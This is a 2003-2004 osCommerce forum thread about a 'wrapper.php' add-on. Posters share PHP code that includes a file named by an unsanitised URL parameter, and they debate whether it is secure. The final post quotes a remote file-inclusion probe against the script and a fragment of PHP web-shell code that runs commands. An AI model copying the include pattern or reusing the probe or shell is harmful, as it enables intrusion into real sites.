Guest Posted March 2, 2003 Share Posted March 2, 2003 Hmm.. what about subdirectories in the wrapped dir... Is that dooable? Tracy Quote Link to comment Share on other sites More sharing options...
gdfwilliams Posted March 2, 2003 Share Posted March 2, 2003 Here's my fix for the breadcrumb conundrum: catalog/wrapper.php: <?php require('includes/application_top.php'); // the following cPath references come from application_top.php $category_depth = 'top'; if ($cPath) { $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . $current_category_id . "'"); $cateqories_products = tep_db_fetch_array($categories_products_query); if ($cateqories_products['total'] > 0) { $category_depth = 'products'; // display products } else { $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . $current_category_id . "'"); $category_parent = tep_db_fetch_array($category_parent_query); if ($category_parent['total'] > 0) { $category_depth = 'nested'; // navigate through the categories } else { $category_depth = 'products'; // category has no products, but display the 'no products' message } } } require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT); require ('wrapped/'.$file.'.php'); $breadcrumb->add(NAVBAR_TITLE, tep_href_link('wrapper.php', 'file='.$file.'.php', 'NONSSL')); ?> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS; ?>> <head> <meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>"> <title><?php echo TITLE; ?></title> <base href="<?php echo (getenv('HTTPS') == 'on' ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>"> <link rel="stylesheet" type="text/css" href="stylesheet.css"> </head> <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"> <!-- header //--> <?php require(DIR_WS_INCLUDES . 'header.php'); ?> <!-- header_eof //--> <!-- body //--> <table border="0" width="100%" cellspacing="3" cellpadding="3"> <tr> <td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2"> <!-- left_navigation //--> <?php require(DIR_WS_INCLUDES . 'column_left.php'); ?> <!-- left_navigation_eof //--> </table></td> <td width="100%" valign="top"> <!-- body_text //--> <? if ($file != '') { echo TEXT_TO_WRAP; } else { print "<b><a href=wrapper.php?file=index.php><u>Access your file manager by clicking here.</u></a></b>"; } ?> <!-- body_text_eof //--> </td> <td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2"> <!-- right_navigation //--> <?php require(DIR_WS_INCLUDES . 'column_right.php'); ?> <!-- right_navigation_eof //--> </table></td> </tr> </table> <!-- body_eof //--> <!-- footer //--> <?php require(DIR_WS_INCLUDES . 'footer.php'); ?> <!-- footer_eof //--> <br> </body> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?> and chage the wrapped files so that more than JUST the text is included. for example, here's my catalog/wrapped/demo.php <?php define('NAVBAR_TITLE', 'this is a test'); define('TEXT_TO_WRAP', ' <table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td height="14" class="infoBoxHeading"><img src="images/infobox/corner_left.gif" border="0" alt="" width="11" height="14"></td> <td height="14" class="infoBoxHeading" width="100%"> <!-- BEGIN TABLE TITLE HERE --> My little demo page. <!-- END TABLE TITLE HERE --> </td> <td height="14" class="infoBoxHeading"><img src="images/infobox/corner_right_left.gif" border="0" alt="" width="11" height="14"></td> </tr> </table> <table border="0" width="100%" cellspacing="0" cellpadding="1" class="infoBox"> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="4" class="infoBoxContents"> <tr> <td class="smallText" width="33%" valign="top"> <!-- center content here --> <center> Welcome to my demo page.<br> <br> Any thing can be used here, <?="including php!!"; ?> </center> <!-- end center content here --> </td> </tr> </table> </td> </tr> </table>'); ?> working version can be seen here: www.magshack.com/wrapper.php?file=demo (note - no more need for .php in file define in the URL) - Greg Quote Link to comment Share on other sites More sharing options...
mugitty Posted March 2, 2003 Share Posted March 2, 2003 Hey, Greg; Why don't you zip that puppy up and add it to the original contribution folder as a separate file with an explanation? :wink: Quote ... if you want to REALLY see something that doesn't set up right out of the box without some tweaking, try being a Foster Parent! Link to comment Share on other sites More sharing options...
gdfwilliams Posted March 2, 2003 Share Posted March 2, 2003 ugh - in the above wrapped/demo.php, be sure to properly punctuate any php tags within the wrapped text: <center> Welcome to my demo page.<br> <br> Any thing can be used here,'. "including php!!" .' </center> rather than <center> Welcome to my demo page.<br> <br> Any thing can be used here, <?="including php!!"; ?> </center> Quote Link to comment Share on other sites More sharing options...
gdfwilliams Posted March 2, 2003 Share Posted March 2, 2003 working version can be seen here: www.magshack.com/wrapper.php?file=demo sorry - wrong URL. Try this: www.magshack.com/osc/wrapper.php?file=demo Quote Link to comment Share on other sites More sharing options...
Guest Posted March 2, 2003 Share Posted March 2, 2003 My first post here and also my first contribution. This whole contribution needs re-writing from the ground up as it's insecure, and poorly coded. I've not yet been able to find time to do it :( A Believer SHOULD know better..... Encouragement, guidance and feedback generally produce better results... Regards Ed i-netmedia Quote Link to comment Share on other sites More sharing options...
Guest Posted March 2, 2003 Share Posted March 2, 2003 Encouragement.. thats the way to go.. I like it :D Greg.. I tried your code but it would work.. I kept getting damned errors. Copy and paste.,... thats all I have to do.. and I can't get that right!!! :lol: Tracy Quote Link to comment Share on other sites More sharing options...
eredman Posted March 2, 2003 Share Posted March 2, 2003 I'm not understanding. What security problem is exactly wrong here? I've been using this with no problems that I am aware of. Quote Link to comment Share on other sites More sharing options...
Guest Posted March 2, 2003 Share Posted March 2, 2003 If I knew what a "Believer" was I might take some notice. http://www.oscommerce.com/forums/viewtopic.php...hlight=believer Quote Link to comment Share on other sites More sharing options...
Guest Posted March 2, 2003 Share Posted March 2, 2003 I'm not understanding. What security problem is exactly wrong here? I've been using this with no problems that I am aware of. Look in your server error log. I just looked, what are we looking for? There are no entries relating to oscWrapper ?? Maybe you could enlighten us all :-) Regards Ed Quote Link to comment Share on other sites More sharing options...
gdfwilliams Posted March 2, 2003 Share Posted March 2, 2003 Thanks, Burt -- I'll include your fixes with a contribution that also fixes with breadcrumbs. I agree - wrapper isn't the best solution. I personally am not using it, but I can certainly see its utility for certain circumstances. The Information Unlimited contribution does offer similar functionality... Your fixes should address any security concerns by limiting the pages that can be called by wrapper. Are there any opther security issues that you have identified? Thanks, Greg Quote Link to comment Share on other sites More sharing options...
singspiel Posted March 19, 2003 Share Posted March 19, 2003 Maybe a bit late. I like this mod really handy for adding pages quick. Only problem I get is when I first arrive at my site it bolts on the osCsid= code after my link, so it can't find page properly, but checking through some of you guys and gals who have tried it you seemed to have cracked it am I missing something. Nev Quote Link to comment Share on other sites More sharing options...
Guest Posted September 23, 2003 Share Posted September 23, 2003 I need help. I have it installed and cant figure out what username and password to use. The main Admin doesnt work. HELP lol Dv10 Quote Link to comment Share on other sites More sharing options...
walmslei Posted April 13, 2004 Share Posted April 13, 2004 Hi Everyone Someone tried to call the URL below this morning (about 6am UK time). http://www.mysite.co.uk/wrapper.php?file=h...txt?&cmd=id The file, HKZ.TXT contains the following coding: bash-2.05# /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); $output = str_replace("\n","\nbash-2.05# ",$output); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> Anyone have any ideas on what they were trying to achieve? My understanding is that the osWrapper function cannot call an external site, as it does not exist within the 'wrapped' folder (my tests indicate an error message every time I have tried). Comments appreciated! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.